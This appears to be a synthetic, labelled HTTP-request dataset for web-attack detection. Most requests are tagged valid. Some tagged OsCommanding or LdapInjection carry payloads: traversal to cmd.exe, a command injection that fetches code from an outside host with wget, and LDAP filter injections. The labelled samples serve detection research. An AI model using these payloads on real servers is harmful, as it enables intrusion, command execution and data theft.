UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 802x162
Via: FTP/9.4 24.186.174.242:5, FTP/6.2 www.sip4emu1.jpeg
Transfer-Encoding: rzses
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 540641181
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27447
Start - Id: 21866
class: Valid
GET /sinfeeipyerl4o/eltNotenmlto6v/cLdivOrL.pU-A.php3? HTTP/1.1
Host: 226.216.107.57:80
Connection: aO9dnine
Accept: video/*, image/gif, application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2500
Client-ip: 127.36.79.82
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="7"
Date: Thu, 04 Aug 05 02:52:14 GMT
ETag: "_oWm6wFQ0bxMU5_"
Expect: 100-continue
From: iese@tecT.fr
If-Modified-Since: Wed, 11 May 05 20:18:08 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:21:11 CET
If-Match: "E3B7QlslGf7mapE"
If-None-Match: *
If-Range: "5kgnz27d5AoRuhq"
Max-Forwards: 2778
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: nhS2bu tseedi=nlphaPac
Range: -34244,001-
Referer: /pm9t/yokyii.bin
TE: trailers,gzip,deflate;q=0.2
Trailer: Proxy-Authorization
User-Agent: arglMmuSAJ http://www.wlTeGenu.st
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: FTP/8.2 237.159.55.249:0
Transfer-Encoding: gzip
Upgrade: foarn/6.0
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21866
Start - Id: 434
class: Valid
GET /xfs2b1KMk.png? HTTP/1.0
Host: 126.1.177.138
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.6, iso-8859-15, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: eTa-avz7;q=0.3, 69ssp-e1, l-stdeNh2S, rhtahe-7eep;q=0.8
Cache-Control: n='adtde'
Client-ip: 245.193.75.230
Cookie: E.0qOR1=hjetokts;rxrcniu=am8;BiframeopenvshbW=30
Cookie2: $Version="53"
Date: Sun, 07 Jun 09 18:26:21 UTC
ETag: W/"YDYaSnlQSdor_IUB"
Expect: w5de
From: enIsusc@saoftwhhea.net
If-Modified-Since: Fri, 30 Jun 06 02:05:39 UTC
If-Unmodified-Since: Fri, 28 Aug 09 22:45:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Mar 04 17:52:51 UTC
Max-Forwards: 33
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Eiop oaUat=rr1iwqp
Authorization: NTLM dGk1czQ4YWFoMnR0cnlraG90b2FoaElrODBlbXN1ZE5hZXVpMw==
Range: 95586-,-851,-5894
Referer: http://bElrz.biz/dletnf.mpg
TE: trailers,deflate;q=0.9
Trailer: Authorization
User-Agent: issq3otleae2tnt
UA-CPU: Sparc
UA-Disp: 506,620,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7545x2141
Via: 9.1 251.76.46.50:027, 5.7 www.eoda.html
Transfer-Encoding: gzip
Upgrade: t9us/7.5, ceVt/6.8, Anu/0.3, Hli/0.3, y9t/6.4
Warning: 246 www.carO7fas.css "rFoaw6tbOtrgpE95" "Wed, 05 Jul 06 06:22:48 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 9170010950
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 434
Start - Id: 5091
class: Valid
POST /txC75up-Bw5gn8eZgiV/hxpjKU2-Ec/drsueuOtrud3/NlYBevalPKnEWV.qdropN.msf? HTTP/1.1
Content-Length: 35
Content-Language: yiacurea,w6gr,i2fs6i
Content-Encoding: deflate
Content-Location: http://www.useis.biz/osltwkhz/ses99nhN.nsf
Content-MD5: d1NyclRraGFnVHMweWNscA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Feb 04 07:26:47 GMT
Last-Modified: Tue, 20 Jul 04 11:53:12 GMT
Host: www.nbneltj.ch
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.5, compress;q=0.6
Accept-Language: *
Cache-Control: rsnm=y
Client-ip: 56.116.172.92
Cookie: nlcisAt=cf]iopenub
Cookie2: $Version="427"
Date: Wed, 01 Aug 07 06:51:30 CET
ETag: "DaBEn5Miu.YgdvkWi"
Expect: 100-continue
From: eiats@ade7g.de
If-Modified-Since: Tue, 28 Nov 06 11:36:12 UTC
If-Unmodified-Since: Mon, 26 Apr 10 23:55:42 CET
If-Match: "QveQ3tUlPsDkv8vTbSx"
If-None-Match: *
If-Range: Sun, 09 Mar 08 03:53:48 UTC
Max-Forwards: 9903
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic Z3JhbmRpMTI6dDQ5ZTgwaQ==
Range: 4666-,507125-81685,186998-
Referer: http://www.sneenst.be/truyta1/iaim/fise/dhTeaacN.gif
TE: deflate
Trailer: Host
User-Agent: eaootE0Ore/3.1.3.1.2
UA-CPU: PowerPC
UA-Disp: 2471,605,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7848x0876
Via: HTTP/6.9 www.ereinzE.css:87699
Transfer-Encoding: compress
Upgrade: wdrl1/4.6, o0t/6.1, R5oleg/3.8, gde/0.1
Warning: 172 www.tonle.shtml "itac7inoeo6towt2" "Fri, 23 May 08 05:18:47 CET"
X-Forwarded-For: 187.213.168.146
X-Serial-Number: 100173301629912
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

3i=av0mG.2U2&6ltH1sg=nss&yseoqn=301

End - Id: 5091
Start - Id: 1965
class: Valid
GET /w0bg.shtml?eZr1ieKYK=aesqCs5home&ieferPd=3tso&fvxBbinKcQ=0596387539&h7eRtdgdi=eKO9rGWVAP.3&lthd8yamseoA=21625900&irdoeetee7notn=4%2Bnqdaa1tel7rmeu%28er&aTborEtrcoino=uu%3Bo3&niYReQFH=aKsj5vAt%40JF&smjEevswne=am%3Aeioasuani2&0adch=64585 HTTP/1.1
Host: 7.216.3.18
Connection: close
Accept: application/postscript;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 13.36.44.80
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="75"
Date: Tue, 04 May 04 02:37:13 UTC
ETag: W/"plLBmnTpaJzgnQ."
Expect: ioriht=n0uemi
From: khsdYrld@oa9tovuJa.st
If-Modified-Since: Sun, 13 May 07 12:35:47 UTC
If-Unmodified-Since: Sat, 24 Feb 07 08:16:03 GMT
If-Match: *
If-None-Match: "6GQzOvR3l.g-6Uu0"
If-Range: "k76ITeuH3mvh0f2"
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: Basic YWxtdGg5OmVvdG5lSXJl
Range: 907906-,4755-184
Referer: /ohcs7r/uTonE2a/nrkoas/hnSwt/6ewetah0.exe
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.3 (compatible; MSIE 2.5; Win 9x; 8rpta; eWlrncuss)
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: 6.3 www.Hemrc1th.html
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 246 144.242.96.229 "zhitriestohvafi" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1965
Start - Id: 43977
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Ojsh8Od.gov
Connection: oiyraaee
Accept: application/rtf, image/gif;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 9.225.171.68
Cookie: ec=67695583;NFU4rlogI=njWpm
Cookie2: $Version="378"
Date: Fri, 26 Feb 10 10:49:34 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: 6lgploor
From: ls2l@ewemlDhle.org
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: *
If-None-Match: "SErLrC-h0mfVzu5J."
If-Range: *
Max-Forwards: 0437
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic b3NpaDphbnVl
Range: 2873-08
Referer: /Axatn4fi/lSrnka.js
TE: trailers
Trailer: Referer
User-Agent: 3IumtA
UA-CPU: x86
UA-Disp: 8896,133,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: 2.6 www.0ixttae.png, 4.0 142.223.244.108:76143, 2.0 www.asaur.gif
Transfer-Encoding: identity
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43977
Start - Id: 3029
class: Valid
GET /ng07.szldSl1/MKbodynph-/yNKfOB3XX.keyt6u.nsf?s.n.51Uas=rgcaiwrincludemuit%3C&3fpzpp=abm%3Dg&nmertxnrentw=8feme%3Faadt&akesehnurr2ee=fxkb8qgTd_nJ&uyoidhil5=a3zcMSF_KeN.&9Te1csahx8side=k1G&maG=hcsEoartdae6uya66&sA=4117504695&O7aTHfohttpwulhtpass=d7a&usrwq2=6823&aeii3SsmStx=%7C+&D8VcopyzTSzpGs=6327&tnoubso7=7938 HTTP/1.0
Host: 163.88.167.226
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.7, iso-8859-15, us-ascii;q=0.6
Accept-Encoding: *
Accept-Language: 3etxs6-aeasahoy, o-g1etuna, r9ralVot-btn;q=0.1
Cache-Control: no-transform
Client-ip: 45.196.69.200
Cookie: lTjhetaTa=4179055660;tos6eemto=\8/;skuwfny=%u83podoh3h5n]processing-instruction+;pilkepjezmyrzlz=0676;tlqlaAp=89;fEzlfoy2eeMoe=3yT
Cookie2: $Version="42"
Date: Wed, 24 Feb 10 09:04:04 CET
ETag: "vACChktZsKtVPeg"
Expect: 100-continue
From: vnsept@amber3mas.com
If-Modified-Since: Fri, 19 Dec 08 03:00:24 UTC
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: "EYXxnozAoyIJDrynIUv"
If-Range: "gF6.nT4JvKbZLz1"
Max-Forwards: 3
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: aAxi3n wp7nsimi=binuofe
Authorization: NTLM UGV0YXRtV091T2hPYW9zaGxhVWg5ZXJ0dHRlNWhub2k1ZWhKbGpldA==
Range: 37991-,-13
Referer: /5tEeot3/d7ysoe/jlsye/fvltI91.conf
TE: trailers
Trailer: Warning
User-Agent: jewO7 (euesZ6; mGcMe@gCTK)
UA-CPU: PowerPC
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 118x5064
Via: 0.2 www.aiosi.jpg:3, HTTP/5.6 194.188.129.104, 9.9 196.76.81.207
Transfer-Encoding: deflate
Upgrade: eyshdo/6.5, d0a/4.9, trpole/3.1, 9iyrb/0.5, o2zegv/7.8
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 214.228.126.215
X-Serial-Number: 2317803874
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3029
Start - Id: 28557
class: Valid
GET /kIK/a3PJYveKrpFJjpiR1/wK@A/ttutriwhisdCa/zO/a2eHg5SRnWiGMT0hn7/yniyazne/DlWPvQv/eiyNwPJ9EgId2Mv/mEjhhgNa4rectIotSdhb/mABG21s8pu7FusG.php?lole0e=201500&ynnenh5t=838&cpd=%40-+o+U%3B2+styleshutdown+%7Exninsertg&4s=egroup+by&nousk=t-y&oSiTenuonrn5w=l&dmIo6SstOhaSeuw=5&wtoaSo=i03T7hZ HTTP/1.0
Host: www.eple4b.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: se-erehB;q=0.8, hmeeeee-br;q=0.4, vte7d-i, mhuhouS7-tttoa3;q=0.7, hbmth-q7eYiocd;q=0.3
Cache-Control: yisrD=lana
Client-ip: 72.50.172.162
Cookie: etn=seu8mia
Cookie2: $Version="654"
Date: Sat, 27 Mar 10 21:32:15 CET
ETag: W/"K45FpoeZ6ZUmyGN"
Expect: 100-continue
From: ekkeeGea@9uAbioy.it
If-Modified-Since: Tue, 21 Dec 04 14:03:04 UTC
If-Unmodified-Since: Mon, 19 Jun 06 01:05:04 UTC
If-Match: "za@Llkj6JP0RnC3_"
If-None-Match: *
If-Range: Wed, 05 Jan 05 08:59:44 UTC
Max-Forwards: 4
MIME-Version: 8.0
Pragma: yekct='ag'
Proxy-Authorization: Basic c3RyZ3R5bnM6bmEyag==
Authorization: NTLM aWV0ZWtzYUU1cmFydHJyaTZmbm9KdmNBZXNobHRkbnhjbWNiYW9mOG5TbHJpYw==
Range: -485791
Referer: /s3lfdpw/t9rifd/osRe/wetaeoTe/hkoNe.txt
TE: chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.3; ro-iv; rv:8.1.9) Gecko/84004671
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6545x8948
Via: FTP/3.2 56.167.210.205, RstLzt/8.1 115.141.233.221:29, 6.3 www.aoieD9l.htm
Transfer-Encoding: identity
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28557
Start - Id: 14156
class: Valid
GET /irhVf1B./aFvs_4KY6xk/1hetPt/e9@rh8ByMhK22/omstssiastOr/xmlMLc5HXSHGwgetQ6Ie/Frre0nmltTtttek/IyVvarQametadN7A.m/iedXkM@aQQbCJ./tGFlyYZvxCF1Ir/uJgSfOXLnIQk/6A8fv1CfbF.gif?lbrmndhRuaem=kosme&rosn5deOauwnA=pBNmzc9rcn&g9bt44i=ewh6te%25rxdedtlt&wmnry=autoexec%3A%3E+o+kbg+vbscripttfs5chldt&ya=6&6netcatuQscriptB3x5@accept0=nluEwtnlog8arRwindow.openks&ctvhiloe=nezE5&k7EF=iestOte&lidmntnllO6=57183 HTTP/1.0
Host: 130.29.117.206
Connection: 6ineniee
Accept: video/*;q=0.9, image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 1r-Sosee, os-rchpba, x6eiod-e;q=0.3, ecrtdbp-5ese8m;q=0.6
Cache-Control: max-age=18727
Client-ip: 89.230.144.162
Cookie: twnTGo=3472
Cookie2: $Version="66"
Date: Thu, 25 Sep 08 24:31:06 UTC
ETag: "mMrn0FANq1Io1UV06"
Expect: 7dOhns
From: zess@lSzAtt.de
If-Modified-Since: Thu, 19 Oct 06 05:00:24 CET
If-Unmodified-Since: Thu, 11 May 06 24:38:02 GMT
If-Match: "6Rou@m2lu83M6UltRI"
If-None-Match: "bh1YD66oqZeekeCpx9"
If-Range: Thu, 01 Jan 09 03:37:01 UTC
Max-Forwards: 97
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic TGJyc3I6N281ZTRycw==
Authorization: NTLM eWRDYW5pcW9laG1xeXJlaWdvaWU3Y3RlYWVpb2ttSG5nc2Vi
Range: -395
Referer: /1syereie/gagg3/rbgruhs/ilhol.png
TE: trailers,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 7.4; hl-sc; rv:9.2.1) Gecko/28124941
UA-CPU: x86
UA-Disp: 946,473,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5343x014
Via: 7.4 236.189.225.191, 5.8 194.148.140.31, 4.8 181.193.23.240
Transfer-Encoding: gzip
Upgrade: calan/1.8, vcenE/4.1
Warning: 166 42.97.253.158 "rwatpa" 
X-Forwarded-For: 126.23.131.140
X-Serial-Number: 8863769
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14156
Start - Id: 37480
class: LdapInjection
GET /oSg@o5Gi3ZHEty9pT/srFmr2a1ehTxyv/7O.php? HTTP/1.1
Host: www.ctbt.cz:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: cp-950;q=0.7, iso-8859-8-i;q=0.1, x-mac-hebrew;q=0.0, ks_c_5601-1987;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.40.195.249
Cookie: 5hyblsQNgroup bySp@8=)   ( | (displayName=had*)    (name =  had*  )( mail=had*  );auglduenoah=so\ lOevalj'eOhttpsi9trwinl
Cookie2: $Version="465"
Date: Mon, 17 Aug 09 12:52:29 UTC
ETag: "k0NQUqdCVpoxxSEOVAzR"
Expect: tjza
From: i2eeh@yhiguo.be
If-Modified-Since: Mon, 07 Apr 08 24:34:38 GMT
If-Unmodified-Since: Sun, 07 May 06 14:57:32 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 21 May 09 08:00:59 GMT
Max-Forwards: 0
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic Nm1pUk9zaTp1ZXZjQXI=
Authorization: NTLM ZHNtaWVyZWduc3Q3aXV0bmkzYm1kZlN0ZWFFb3NyaW9o
Referer: http://eadeftt.be/xe1bte/etrr/tNw6el/anlcT/lrnridac.cfm
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: ndo6Uqw6 http://www.nnuota.ch
UA-Disp: 6467,4421,8
UA-OS: Windows NT
UA-Color: color32
Via: 0.1 107.61.182.113, HTTP/9.1 www.ngoy.shtml:115, HTTP/9.5 5.37.173.110:276
Transfer-Encoding: gzip
Warning: 677 51.35.224.146 "edtba6i7Eepe" "Sun, 25 Jan 04 03:07:08 GMT"
X-Forwarded-For: 84.127.146.130
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37480
Start - Id: 28343
class: Valid
GET /aYMaAuUywVG4/0tKdkd/V.J6KNjD0GDGselectv/xmlcN_EDKebM.php4?A1pynnHrtsaue=%25hg HTTP/1.1
Host: 244.202.155.103
Connection: eeokR
Accept: */*
Accept-Charset: euc-jp;q=0.6, ks_c_5601-1987
Accept-Encoding: gzip;q=0.8, gzip, gzip;q=0.0, gzip;q=0.8
Accept-Language: *;q=0.5
Cache-Control: mz9tyW='kYar2'
Client-ip: 125.221.250.165
Cookie: loe=5%EiNyoE=2;dSt=EEeaccept
Cookie2: $Version="477"
Date: Thu, 06 Nov 08 16:15:37 GMT
ETag: W/"mfRHSAnTHE94RQ5"
Expect: 100-continue
From: nicserws@tdhtrrpo.net
If-Modified-Since: Sat, 17 Apr 04 07:32:29 GMT
If-Unmodified-Since: Sun, 27 Mar 05 18:46:17 GMT
If-Match: "ae7GRja41vl9-ZJa7a"
If-None-Match: "BhTd7CDul9oxrpYubL"
If-Range: Wed, 11 May 05 21:04:00 CET
Max-Forwards: 0102
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic bmhycGhuVzp0Y2VUYnB0dA==
Authorization: trasAd o9rIesat=ihhio
Range: 2735-73,95-
Referer: http://www.fxFeinad.cz/kldivty/ietmwech/aofooHso.bin
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.3 (Windows; U; Windows NT 6.0; mm-ao; rv:8.9.3) Gecko/71961097
UA-CPU: StrongARM
UA-Disp: 853,814,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 084x4486
Via: 4.5 222.154.68.230, 0.5 www.5idWajy.shtml, 7.2 229.27.41.144
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 627 www.ldue2r.tiff "esuesteob8rRholsix" 
X-Forwarded-For: 214.238.31.113
X-Serial-Number: 4245119888
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28343
Start - Id: 43046
class: OsCommanding
POST /oskeuiHaisgi/.LwPWP6n/exYxkfy/IsCfkjFP9pnPl/neig/mms/t_1P/oH6cqw67wMmSY.cfm? HTTP/1.1
Content-Length: 242
Content-Language: t1nwdy
Content-Encoding: gzip
Content-Location: http://www.ORnspcm.fr/woeeteer/sbhrthwm.php
Content-MD5: bGtjd2VoaHRpbnN4Zm9SZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Oct 09 07:35:24 CET
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: 71.164.60.192
Connection: close
Accept: image/gif;q=0.5, application/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 241.8.137.249
Cookie: vsetrAslttyWpqK=97303013;erw=aDhi
Cookie2: $Version="0"
Date: Tue, 17 Jul 07 02:11:07 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: mreeste@aqoethavtE.gov
If-Modified-Since: Sun, 16 Aug 09 21:58:26 CET
If-Unmodified-Since: Mon, 26 Sep 05 09:35:05 GMT
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: "QpOElv88Hp3DgAg9E"
Max-Forwards: 7
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -884,462922-,-41322
Referer: http://www.gasdE7r.com/enleisee/dyfQt/e1sdaUdA/YatsIa4e.swf
TE: trailers,trailers,gzip
Trailer: From
User-Agent: qsei0rUeos (hmPoAT.x)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 2.8 www.hdehw.tiff
Transfer-Encoding: gzip
Upgrade: 6eo/8.6, xnieO/5.1, ontIn/6.5, lyi/1.7, atafbe/1.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1r="     ;    /usr/bin/wget     www.elnt.com/al   ;&jdaje7ovnzye=u'+oh&rsyeRreit=900414453&hirDeNtrev=8&ehgsesedoIloeh=tnxsle&nf4te=rjecbedhtodesv2hie&en1zot=Hetsvoshg&nIscesebn=afui&weau=17884069&uAy3ptnvk8=y1locationoe8smo

End - Id: 43046
Start - Id: 36953
class: LdapInjection
PUT /dDNco/eemOdbtn.dll? HTTP/1.0
Content-Length: 293
Content-Language: d,vaPnN
Content-Encoding: compress
Content-Location: /obT8w8.conf
Content-MD5: bEFhbURsbXRhazg2ZWQ5VA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 04 May 09 11:40:03 GMT
Host: 236.40.137.146:48445
Connection: ahk5ovua
Accept: */*;q=0.5
Accept-Charset: iso-8859-3;q=0.1, iso-8859-3;q=0.6, isiri-3342
Accept-Encoding: identity, gzip;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-age=93
Client-ip: 216.121.4.71
Cookie: dilMflka0culWk=5844663
Cookie2: $Version="5"
Date: Sat, 09 Feb 08 09:23:13 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 35
MIME-Version: 6.6
Authorization: NTLM b3RuY1NDbmFFVGVFSHVhbjZlcmVmNmhuN29jZWV6bWljbmVybWNsbUVoZWxoOQ==
Range: -69,-806
Referer: /yvxtiif/wyiirtf/iwEjzh/gosrooam/a9t6ttn.css
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 1.5; rP-5s; rv:8.8.5) Gecko/11390206
UA-Disp: 5315,7595,8
UA-OS: Win98
UA-Color: color32
Via: 4.6 www.owac.shtml, HTTP/1.1 www.e0ote.htm
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qyets=wpugDpfqAelT&Eo=386&2928tX@OD9g0=om@m5Nah.-S&sammformh=r3ODexndcla&etfhu=openo3rek9dssh&5binRn7P3=474970&irfb4lr=2821943775&Ra1znowtsztnpa=)    (|(  cn=*o   'brien*   )(mail   =*o   'brien*  ) &eI=a9services&ozfct9ss=0982572&w63=rtYriuiukcsA D8&5uea8t=7r-+8ynie

End - Id: 36953
Start - Id: 20766
class: Valid
GET /e4fftCnnylatabholhi/tY_/ygrjsect2Mae6reo/mMoxXKNE8WlxoG-XY.nsf? HTTP/1.1
Host: www.mttt1e.cz
Connection: keep-alive
Accept: text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: s-Dr9bn;q=0.9, dino-okuuFO, ittaqEs4-ek
Cache-Control: max-age=301
Client-ip: 129.246.218.61
Cookie: 973swdhDjk=it82anaeem;sdoaei=7956
Cookie2: $Version="690"
Date: Mon, 12 May 08 22:47:35 CET
ETag: W/"qfJA0jbXXdDwigNHh"
Expect: esaeaee=jSehrn;dterorp=ienwi
From: txeT@aevntoegn.com
If-Modified-Since: Fri, 09 Jun 06 20:01:19 GMT
If-Unmodified-Since: Sat, 03 Apr 10 03:14:34 CET
If-Match: "M0MtGqvz.1p0FEV"
If-None-Match: "sA2Q2slyJ-m3fYw"
If-Range: "cNG4YCv0Axg1sy_w"
Max-Forwards: 283
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: Basic c29hM3Q6OWx5QXM3M3Q=
Range: 802086-,4327-
Referer: http://www.hslWMDad.gov/aryjhr/4gr3h.txt
TE: trailers,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/1.5 (compatible; MSIE 8.0; Win 9x; Iassdxr)
UA-CPU: StrongARM
UA-Disp: 369,7940,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2236x546
Via: FTP/2.7 232.179.185.61
Transfer-Encoding: deflate
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 23.226.91.137
X-Serial-Number: 716222532954
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20766
Start - Id: 37886
class: LdapInjection
GET /lWo_/emz9ytplZirl2hoa0opd/a4p0XdS9AZdpJd-DVn7/hNoPWCt-s/4lfhHYNetchiuonA/dz/l6hlbolkhsuTwecf9rn.dll?Daas=n8y&sia9goyshsgiptz=E7yx&srEex=ejandep1qht&kthDCand=igw+emttnlgb&jiammiainDwo52=connectdn+jUe%5Deo&stc=HeuwnCe&Ix2wp-4FuMU7as=hcpAqq%7Cuu&e8pssThshlauu2s=beFod4ruUovbiodec&ot=iOo%29%28%7C++%28z9%3D*%29&fitretee6sl4b=klodfmio2m HTTP/1.0
Host: 192.119.184.143
Connection: close
Accept: image/gif;q=0.2
Accept-Charset: iso-8859-2;q=0.5, koi8-r;q=0.3, euc-jp;q=0.5
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="4"
Date: Tue, 28 Aug 07 11:18:22 CET
ETag: W/"pNxix-WiJNQLVltQ"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 14 Sep 05 03:41:56 UTC
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "m52lgc36FopxNka"
If-None-Match: "4QttuDTIEQQlu6Uw"
If-Range: Sat, 13 Sep 08 06:11:14 CET
Max-Forwards: 12
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=ebfc4BaD
Range: 41-534098,-55
Referer: /ash4tn/carrdhro/7dtm/eiw8txt6.swf
TE: trailers
Trailer: Authorization
User-Agent: oimqnc/5.0.2.8
UA-CPU: Sparc
